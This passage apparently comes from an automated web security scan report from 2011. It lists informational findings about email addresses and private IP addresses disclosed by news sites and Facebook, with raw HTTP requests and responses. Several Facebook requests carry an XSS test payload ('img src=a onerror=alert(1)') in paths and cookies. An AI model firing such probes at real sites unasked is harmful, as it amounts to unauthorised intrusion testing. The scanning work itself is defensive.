Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256417
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:26 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:jason@huffingtonpost.com" class="arial_11 bold block">jason@huffingtonpost.com</a>
...[SNIP]...
<a href="mailto:tv@huffingtonpost.com">tv@huffingtonpost.com</a>
...[SNIP]...
<a href="mailto:media@huffingtonpost.com">media@huffingtonpost.com</a>
...[SNIP]...

19.12. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The following email addresses were disclosed in the response:
  • jen.bendery@huffingtonpost.com
  • world@huffingtonpost.com

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:jen.bendery@huffingtonpost.com" class="arial_11 bold block">jen.bendery@huffingtonpost.com</a>
...[SNIP]...
<a href="mailto:world@huffingtonpost.com">world@huffingtonpost.com</a>
...[SNIP]...

19.13. http://www.lakewoodbeacon.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lakewoodbeacon.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • info@lakewoodbeacon.org

Request

GET / HTTP/1.1
Host: www.lakewoodbeacon.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 03 May 2011 20:48:46 GMT
ETag: "b4a07965-30b8-4a2654432b8de"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:info@lakewoodbeacon.org" target="_blank">
...[SNIP]...

19.14. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The following email address was disclosed in the response:
  • yourfriend@email.com

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a name="aol-addthis" href="mailto:yourfriend@email.com?subject=Check this out: Sources: Fedor-Hendo Fight Could Be Announced Within 24-72 Hours&body=http://mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/" title=
...[SNIP]...
<a name="aol-addthis" href="mailto:yourfriend@email.com?subject=Check this out: Sources: Fedor-Hendo Fight Could Be Announced Within 24-72 Hours&body=http://mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/" title=
...[SNIP]...

19.15. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The following email address was disclosed in the response:
  • yourfriend@email.com

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<a name="aol-addthis" href="mailto:yourfriend@email.com?subject=Check this out: Former NHL Enforcer Donald Brashear to Fight at Ringside MMA 11&body=http://mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/" title="
...[SNIP]...
<a name="aol-addthis" href="mailto:yourfriend@email.com?subject=Check this out: Former NHL Enforcer Donald Brashear to Fight at Ringside MMA 11&body=http://mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/" title="
...[SNIP]...

19.16. https://www.neodata.com/pub/snew/new_print.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neodata.com
Path:   /pub/snew/new_print.shtml

Issue detail

The following email address was disclosed in the response:
  • sportingnews@emailcustomerservice.com

Request

GET /pub/snew/new_print.shtml HTTP/1.1
Host: www.neodata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Sporting News Magazine - Sporting News</title>
<link href="htt
...[SNIP]...
<input type="hidden" name="iEmailAdr" value="sportingnews@emailcustomerservice.com">
...[SNIP]...

19.17. http://www.popeater.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • yourfriend@email.com

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932473" href="mailto:yourfriend@email.com?subject=Check this out:Kristen Bell, Dax Shepard Not Planning a Wedding&body=http://www.popeater.com/2011/05/05/kristen-bell-dax-shepard-no-wedding/" title="Kristen Bell, Dax Shepard Not Planning a We
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932453" href="mailto:yourfriend@email.com?subject=Check this out:David Spade Donates $200,000 to Tornado Relief Efforts&body=http://www.popeater.com/2011/05/05/david-spade-tornado-relief-efforts/" title="David Spade Donates $200,000 to Tornad
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932251" href="mailto:yourfriend@email.com?subject=Check this out:Kendra Wilkinson Reveals Plans to Have Another Baby&body=http://www.popeater.com/2011/05/05/kendra-wilkinson-another-baby/" title="Kendra Wilkinson Reveals Plans to Have Another
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932187" href="mailto:yourfriend@email.com?subject=Check this out:\'The Tudors\' Star Jonathan Rhys Meyers Checks into Rehab&body=http://www.popeater.com/2011/05/05/jonathan-rhys-meyers-rehab/" title="\'The Tudors\' Star Jonathan Rhys Meyers C
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932142" href="mailto:yourfriend@email.com?subject=Check this out:Nicole Scherzinger and 50 Cent Get \'Freaky\' in \'Right There\' Video&body=http://www.popeater.com/2011/05/05/nicole-scherzinger-right-there-video/" title="Nicole Scherzinger a
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932130" href="mailto:yourfriend@email.com?subject=Check this out:Glenn Beck and My Chemical Romance Feud Over \'Propaganda\' Accusations&body=http://www.popeater.com/2011/05/05/my-chemical-romance-glenn-beck/" title="Glenn Beck and My Chemica
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932301" href="mailto:yourfriend@email.com?subject=Check this out:Video: Haley Reinhart Blows the Roof Off on \'American Idol\'&body=http://www.popeater.com/2011/05/05/haley-reinhart-house-of-rising-sun/" title="Video: Haley Reinhart Blows the
...[SNIP]...

19.18. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

Issue detail

The following email address was disclosed in the response:
  • kevin.muller@enova-tech.net

Request

GET /client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; ab=univ_ent; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Oritin: *
Content-Type: application/x-javascript
Content-Length: 20009

/*
*
* Copyright (c) 2007 e-nova technologies pvt. ltd. (kevin.muller@enova-tech.net || http://www.enova-tech.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
...[SNIP]...

20. Private IP addresses disclosed
There are 658 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


20.1. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crunchgear.com
Path:   /wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 172.17.34.101

Request

GET /wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg HTTP/1.1
Host: www.crunchgear.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 19:11:47 GMT
Content-Length: 58718
Date: Thu, 05 May 2011 00:58:43 GMT
X-Varnish: 754024011 754023962
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.101
X-Cache: HIT

......JFIF.....Y.Y.....ZExif..MM.*.........................._.......................................................................................(...........1...........2...........i..............
...[SNIP]...

20.2. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crunchgear.com
Path:   /wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 172.17.34.101

Request

GET /wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg HTTP/1.1
Host: www.crunchgear.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:16:47 GMT
Content-Length: 24541
Date: Thu, 05 May 2011 00:58:43 GMT
X-Varnish: 754023854 754019062
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.101
X-Cache: HIT

......JFIF.....H.H......ICC_PROFILE.......appl....mntrRGB XYZ ...........3acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

20.3. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.181.69

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.4. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.40.55

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.5. http://www.facebook.com/10000082482078341583

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.139.31

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.6. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.187.55

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.7. http://www.facebook.com/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.96.57

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
